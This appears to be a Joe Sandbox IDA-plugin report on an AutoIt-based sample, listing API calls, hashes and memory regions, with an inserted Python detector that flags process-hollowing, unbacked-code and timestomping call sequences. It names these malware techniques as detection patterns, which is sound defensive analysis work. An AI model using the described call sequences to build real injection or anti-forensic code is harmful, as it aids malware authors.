                                                  • Opcode Fuzzy Hash: 3106f70ea36f3b277302e58ef458e15ee94f9b64ee7e3e4a7997330f443226d2
                                                  • Instruction Fuzzy Hash: CD012435200BD1DAD621277BEC92B2E77C8DF82B6AF1104A9F419AB1C2DF709C014765
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C29548,?,?,?,?,?,00000004), ref: 00C298BB
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C29548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C298D1
                                                  • CloseHandle.KERNEL32(00000000,?,00C29548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C298D8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: 9af37be15b87c8c5ac52f9905f7a6cadba0f4d8c711f8b7d0c819a53c3c07bfb
                                                  • Instruction ID: d42107a459a922244ef31bedbe10ebee45c163f3e30d4fd3188473f90da6e55c
                                                  • Opcode Fuzzy Hash: 9af37be15b87c8c5ac52f9905f7a6cadba0f4d8c711f8b7d0c819a53c3c07bfb
                                                  • Instruction Fuzzy Hash: 3CE08636140224B7EB211F64EC09FDE7B59FB07B70F144124FB24690F087B1261297A8
                                                  APIs
                                                  • _free.LIBCMT ref: 00C28D1B
                                                    • Part of subcall function 00BE2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00BE9A24), ref: 00BE2D69
                                                    • Part of subcall function 00BE2D55: GetLastError.KERNEL32(00000000,?,00BE9A24), ref: 00BE2D7B
                                                  • _free.LIBCMT ref: 00C28D2C
                                                  • _free.LIBCMT ref: 00C28D3E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                  • Instruction ID: 9ecea1976160d3d5d8b434c5a56867810c4c0f7a6e4e431029c27a973b3ac6dc
                                                  • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                  • Instruction Fuzzy Hash: 64E0C2A160265282CB20A779BC40B8313DC4F48352B04486DB61DD7186CF60F84A8024
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CALL
                                                  • API String ID: 0-4196123274
                                                  • Opcode ID: e5143531ebb9ff1bdf0aa9fb8f3e35643d2b687b96723214fdb1374c14443de1
                                                  • Instruction ID: ff8a0b53bbd5365b2d658ce85c731b6c71b3a72b583c3ca56e652daacef5e965
                                                  • Opcode Fuzzy Hash: e5143531ebb9ff1bdf0aa9fb8f3e35643d2b687b96723214fdb1374c14443de1
                                                  • Instruction Fuzzy Hash: 33224570608205DFC724DF14C495F6ABBE1FF84304F1589ADE89A9B262D731EC85DB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: EA06
                                                  • API String ID: 4104443479-3962188686
                                                  • Opcode ID: ca73a1d9c2036a1f17050aa16c27b94cd896ffb29882a2671e4752dd529dd9c3
                                                  • Instruction ID: b79754562fcecdfe15c4a77061406ff7ea281fddcafd967a5044094feb160ef7
                                                  • Opcode Fuzzy Hash: ca73a1d9c2036a1f17050aa16c27b94cd896ffb29882a2671e4752dd529dd9c3
                                                  • Instruction Fuzzy Hash: C0412921A0415867DF21AB5488B1FBF7FE2DB45310F2844FDED879B282D7209F4483A1
                                                  APIs
                                                    • Part of subcall function 00BC4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00BC4BEF
                                                    • Part of subcall function 00BE525B: __wfsopen.LIBCMT ref: 00BE5266
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,(l,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4E0F
                                                    • Part of subcall function 00BC4B6A: FreeLibrary.KERNEL32(00000000), ref: 00BC4BA4
                                                    • Part of subcall function 00BC4C70: _memmove.LIBCMT ref: 00BC4CBA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                  • String ID: (l
                                                  • API String ID: 1396898556-844116408
                                                  • Opcode ID: 30ea5893b93cb982fd012ce35f0df23db726b80313dbae8b7c236d822d5e3e60
                                                  • Instruction ID: 90ad57f8e04270945949652dc16d8a8cda2e233938e354d0d89dfca51f5c7adf
                                                  • Opcode Fuzzy Hash: 30ea5893b93cb982fd012ce35f0df23db726b80313dbae8b7c236d822d5e3e60
                                                  • Instruction Fuzzy Hash: 2311A731640206ABCF15AFB0C866FAE77E5EF44750F1088ADF941A7181DB719F059751
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                  • Instruction ID: e5295fa5b99ea68872db5f8bcb209324b416a354b1138bb9a7994b1633be1983
                                                  • Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                  • Instruction Fuzzy Hash: 7B314DB1644606AFC704DF69C8D1E69B3E9FF4832071586ADE919CB291EF70E960CB90
                                                  APIs
                                                    • Part of subcall function 00BE571C: __FF_MSGBANNER.LIBCMT ref: 00BE5733
                                                    • Part of subcall function 00BE571C: __NMSG_WRITE.LIBCMT ref: 00BE573A
                                                    • Part of subcall function 00BE571C: RtlAllocateHeap.NTDLL(00ED0000,00000000,00000001,00000000,?,?,?,00BE0DD3,?), ref: 00BE575F
                                                  • std::exception::exception.LIBCMT ref: 00BE0DEC
                                                  • __CxxThrowException@8.LIBCMT ref: 00BE0E01
                                                    • Part of subcall function 00BE859B: RaiseException.KERNEL32(?,?,?,00C79E78,00000000,?,?,?,?,00BE0E06,?,00C79E78,?,00000001), ref: 00BE85F0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 3902256705-0
                                                  • Opcode ID: 19f4680229710c32bacedfff8c6dc6a58e22817a8afcdd88c0ce5de4b8fb05a0
                                                  • Instruction ID: 9836da72caac45151dd7b0608f412508bae3362656ac242dd1dff98c40bfd7d7
                                                  • Opcode Fuzzy Hash: 19f4680229710c32bacedfff8c6dc6a58e22817a8afcdd88c0ce5de4b8fb05a0
                                                  • Instruction Fuzzy Hash: 7BF0F47580025A66CB10BAAAEC419DE77FCDF01311F1044B5FD0896281DFB09AC4D2D5
                                                  APIs
                                                    • Part of subcall function 00BE8B28: __getptd_noexit.LIBCMT ref: 00BE8B28
                                                  • __lock_file.LIBCMT ref: 00BE53EB
                                                    • Part of subcall function 00BE6C11: __lock.LIBCMT ref: 00BE6C34
                                                  • __fclose_nolock.LIBCMT ref: 00BE53F6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  • Opcode ID: f54cc31bb2e55ca9128f389338eb8ef7760de7373cccc946ccf3cdf3fbbffe98
                                                  • Instruction ID: 0016d79a963477972b5d9dd5d667c66ee89b2ed5259c149579865d5a8561cae8
                                                  • Opcode Fuzzy Hash: f54cc31bb2e55ca9128f389338eb8ef7760de7373cccc946ccf3cdf3fbbffe98
                                                  • Instruction Fuzzy Hash: FCF09671800E849AD7206B7798467AD77E06F41379F208199A42AAB1C1CFBC89415B56
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00F5BA0B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F5BAA1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F5BAC3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                  • Instruction ID: 59771b5411d2485ae6c5b2d0d8d7ea713525d0fd73c7483986cd90de85a5cbdc
                                                  • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                  • Instruction Fuzzy Hash: 9812EE24E18658C6EB24DF60D8507DEB232EF68301F1090E9910DEB7A5E77A4F85CF5A
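Two records on this page deserve a second look rather than a scroll past: the CreateFileW / SetFileTime / CloseHandle sequence in the AutoIt runtime (CreateFileW is called with desired access 40000000, GENERIC_WRITE, and creation disposition 3, OPEN_EXISTING, so an existing file is opened for write and then has its timestamps rewritten), and the function directly above, which calls CreateProcessW, Wow64GetThreadContext and ReadProcessMemory from offset 00F59000, a region the sandbox marks "based on PE: false", that is, executable memory with no image behind it. The script below is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses records in the layout shown on this page (bulleted API lines ending in "ref: ADDR", closed by a "Source File: ..., Offset: ..., based on PE: ..." line) and flags those three shapes. The record format it assumes is only what is visible here, the rule names are the example's own, and SAMPLE is constructed from the page's lines with the stack-noise tails of the argument lists trimmed to the real parameters.

```python
"""Flag suspicious API-call shapes in Joe Sandbox IDA-plugin function records.
Added example, not report or plugin code. SAMPLE is constructed from the lines
shown on this page (argument tails trimmed); the rule names are invented here."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w@:~]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File: \S+, Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
GENERIC_WRITE, FILE_WRITE_ATTRIBUTES, OPEN_EXISTING = 0x40000000, 0x0100, 3

@dataclass
class Call:
    api: str
    args: list[str]
    ref: int
    subcall: bool          # True for "Part of subcall function ..." lines

@dataclass
class Record:              # one function: its direct/subcall calls plus the dump region it lives in
    calls: list[Call] = field(default_factory=list)
    offset: int = 0
    pe_backed: bool = True

@dataclass
class Finding:
    rule: str
    ref: int
    detail: str

def parse_records(text: str) -> list[Record]:
    """A record is every call seen since the previous 'Source File:' line."""
    records, cur = [], Record()
    for line in text.splitlines():
        if m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["api"], args, int(m["ref"], 16), bool(m["sub"])))
        elif m := SRC_RE.search(line):
            cur.offset, cur.pe_backed = int(m["off"], 16), m["pe"] == "true"
            records.append(cur)
            cur = Record()
    return records

def _hex(arg: str) -> int | None:
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None   # "?" = unresolved

def _in_order(calls: list[Call], steps: list[set[str]]) -> Call | None:
    """First call of the chain if each step's API occurs after the previous one (by ref address)."""
    it, first = iter(calls), None
    for wanted in steps:
        c = next((c for c in it if c.api in wanted), None)
        if c is None:
            return None
        first = c if first is None else first
    return first

def check_record(rec: Record) -> list[Finding]:
    out = []
    calls = sorted((c for c in rec.calls if not c.subcall), key=lambda c: c.ref)
    # 1. Spawn a process, read a thread context (0x10007 is CONTEXT_FULL for x86), then read
    #    its memory: the opening moves of process hollowing. Debuggers do this too, so it is
    #    a strong lead, not proof on its own.
    hit = _in_order(calls, [{"CreateProcessW", "CreateProcessA"},
                            {"Wow64GetThreadContext", "GetThreadContext"}, {"ReadProcessMemory"}])
    if hit:
        out.append(Finding("process_hollowing_prologue", hit.ref,
                           "CreateProcess -> GetThreadContext -> ReadProcessMemory"))
    # 2. Win32 calls issued from memory with no PE image behind it are injected or unpacked code.
    if calls and not rec.pe_backed:
        out.append(Finding("unbacked_code_region", calls[0].ref,
                           f"calls made from non-PE-backed region {rec.offset:08X}"))
    # 3. Open an existing file for write, then SetFileTime: the timestomping shape.
    #    AutoIt's FileSetTime() compiles to exactly this, so the caller matters.
    for i, c in enumerate(calls):
        if c.api == "CreateFileW" and len(c.args) >= 5:
            access, disp = _hex(c.args[1]), _hex(c.args[4])
            writes = access is not None and access & (GENERIC_WRITE | FILE_WRITE_ATTRIBUTES)
            if writes and disp == OPEN_EXISTING and any(x.api == "SetFileTime" for x in calls[i + 1:]):
                out.append(Finding("timestomp_sequence", c.ref,
                                   f"CreateFileW(access=0x{access:08X}, OPEN_EXISTING) then SetFileTime"))
    return out

def analyze(text: str) -> list[Finding]:
    return [f for rec in parse_records(text) for f in check_record(rec)]

SAMPLE = """\
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00C298BB
• SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00C298D1
• CloseHandle.KERNEL32(00000000), ref: 00C298D8
• Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
• _free.LIBCMT ref: 00C28D1B
  • Part of subcall function 00BE2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00BE9A24), ref: 00BE2D69
• _free.LIBCMT ref: 00C28D2C
• Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
• CreateProcessW.KERNELBASE(?,00000000), ref: 00F5BA0B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F5BAA1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F5BAC3
• Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE):
        print(f"{f.rule:27} ref={f.ref:08X}  {f.detail}")
```

Run against SAMPLE it reports the timestomp sequence at 00C298BB and both the hollowing prologue and the unbacked region at 00F5BA0B, and nothing for the _free record, which is the negative control. Only direct calls are ordered and matched; subcall lines are parsed but ignored so that a shared CRT helper does not make every caller look suspicious. The ordering check uses the ref addresses the plugin prints, which is call-site order within the function, not proven runtime order, so a loop or an early return can still reorder them.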
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 51e497d898cec5db7a9700977d63082d109c780e0310b9a0f10f4dde0ab95772
                                                  • Instruction ID: c3cb82c329fa1dfe12d1b7089aa9f4ab39fba435703a7f84197e06798b473cf7
                                                  • Opcode Fuzzy Hash: 51e497d898cec5db7a9700977d63082d109c780e0310b9a0f10f4dde0ab95772
                                                  • Instruction Fuzzy Hash: 21316B79648A029FC724DF19C490E21F7E0FF19310B14C5AEE98A8B791EB70E881CF94
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: bcc84ad7a2988b1d5a4934c102cb542f39f6792d95fd3dea0a70ce77a6aae57f
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: 4A31E070A101469BC718EF4AC4C4A69FBE6FB59300B7486E5E80ACB351DBB1EDC1DB81
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 4764e68cb8773ab8d92be972de21c7038d40a4a6e442de3c882cd5a8f64c988f
                                                  • Instruction ID: af4fdb34b593092429390d939adf882b8c1c5fd0998a7d5b883ce143c74eedb9
                                                  • Opcode Fuzzy Hash: 4764e68cb8773ab8d92be972de21c7038d40a4a6e442de3c882cd5a8f64c988f
                                                  • Instruction Fuzzy Hash: FF41F5746043459FDB14DF14C498F2ABBE0FF49318F1988ACE99A8B362C772E845CB52
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 52ba1f1a0518798ac5ee20b84f00d66bad25e279fa6a0005188d8c73ec6f62bf
                                                  • Instruction ID: 56607065e946b61e2388e8b3771790d675bded7bf49fb22494cb1068c33d5cda
                                                  • Opcode Fuzzy Hash: 52ba1f1a0518798ac5ee20b84f00d66bad25e279fa6a0005188d8c73ec6f62bf
                                                  • Instruction Fuzzy Hash: F8212472A04A08EBDB148F25E881B7D7BF4FB14350F2084AEF99AC60A0EB70C5D4CB05
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: c53057f4e38b935b28ae632d8bc88d30eb566187eda18c302aaa8208f249618d
                                                  • Instruction ID: 06957f2c24b5c0f5312aa4ea74fe29831b923e4b93c6d62866d4c7bed170f94c
                                                  • Opcode Fuzzy Hash: c53057f4e38b935b28ae632d8bc88d30eb566187eda18c302aaa8208f249618d
                                                  • Instruction Fuzzy Hash: 4D21FFB49083459FDB14DF24C484F1ABBE0BF88314F0589ACE99A57762D731E845CB92
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 00BE48A6
                                                    • Part of subcall function 00BE8B28: __getptd_noexit.LIBCMT ref: 00BE8B28
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2597487223-0
                                                  • Opcode ID: 6f49fe56bc69af1e3ee04824d176eca3335aed9f5efb4e7ede668a15304d87c7
                                                  • Instruction ID: 3efc4f6eb0d50cefcad659ee26ac5c1d80872f1d091956fa1acf39615d01e2be
                                                  • Opcode Fuzzy Hash: 6f49fe56bc69af1e3ee04824d176eca3335aed9f5efb4e7ede668a15304d87c7
                                                  • Instruction Fuzzy Hash: A3F0C231900AC9EBDF11AFB68C067AE37E1EF00325F158594F42CAA1D2CB788D51DB51
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,(l,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4E7E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
